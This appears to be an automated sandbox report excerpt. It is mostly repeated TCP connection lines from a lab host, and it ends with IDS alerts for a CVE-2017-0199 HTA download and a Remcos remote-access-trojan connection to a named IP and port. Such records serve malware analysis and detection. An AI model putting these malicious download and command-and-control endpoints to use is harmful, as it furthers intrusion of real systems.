                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169

                  Networking

                  Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.90.89.98:6498
